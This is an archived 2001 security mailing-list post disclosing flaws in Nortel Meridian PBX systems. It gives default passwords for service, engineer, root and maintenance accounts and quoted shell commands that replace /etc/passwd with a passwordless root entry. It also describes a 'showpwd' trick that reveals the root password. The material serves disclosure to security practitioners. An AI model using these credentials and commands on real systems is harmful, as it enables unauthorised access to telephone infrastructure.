In article <01063012540504.01490@sliver>, H D Moore <hdmat_private> writes I came across this while doing a security review 3 years ago. I tried to contact Nortel several times but never received a response. I guess they don't think it is important :-o >If the PBX is hooked into the actual network, there are quite a few ways to >get access to the system. The easiest method is to tftp the /etc/passwd file >off the system and crack the hashes. If you go this route, you will get a >user account called "service" with a password of "smile" ;) If you log into >the system with this account, you will notice that /etc is mode 0777, so >getting root access is trivial: > >$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd >$ mv /etc/passwd /etc/passwd.bak >$ mv /etc/mah_passwd /etc/passwd >$ su root ># mv /etc/passwd.bak /etc/passwd > >I don't remember which version of this system it was, but the client software >that came with it was called "Meridian Terminal Emulator". You could manage >the PBX with this by first logging in with 0000/0000 then giving it the >manager password of "9999". I really wish I had more time to write up the >stuff I find out there... > >-HD > Anyway I think the service account exists on the MAX,CCR and Link Meridian components. Here are some other stuff I came across, Accounts that give UNIX level access ==================================== Box Account Password Use MAX,CCR,Link service smile General engineer account CCR,Link disttech 4tas Engineer account MAX root 3ep5w2u Root Accounts that give application level access =========================================== Box Account Password Use MAX maint ntacdmax Maintenance account CCR, Link maint maint Maintenance account CCR ccrusr ccrusr User account Link mlusr mlusr User account To gain root access on Link or CCR - Login as disttech/4tas type "showpwd" at prompt enter first 3 letters from Yesterday and first 3 from Tomorrow (e.g. if today is Tuesday enter "MonWed" - note the capitalisation). When you are told this is invalid, enter the same thing again. The root password is now displayed in plain text on the screen. You can now "su" to root with this password. To gain access to the Meridian itself - there are two methods of access depending how the switch is set up. Try password only first as most will probably be set up like this - Password only enter logi 0000 (customer level) logi 1111 (a bit higher) logi 8429 (maintence) Username and password logi customer PASS? 0000 logi admin1 PASS? 1111 logi to PASS? 8429 Hope this helps, Mark. -- Mark Rowe IT Security Consultant -------------------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 07:46:04 PDT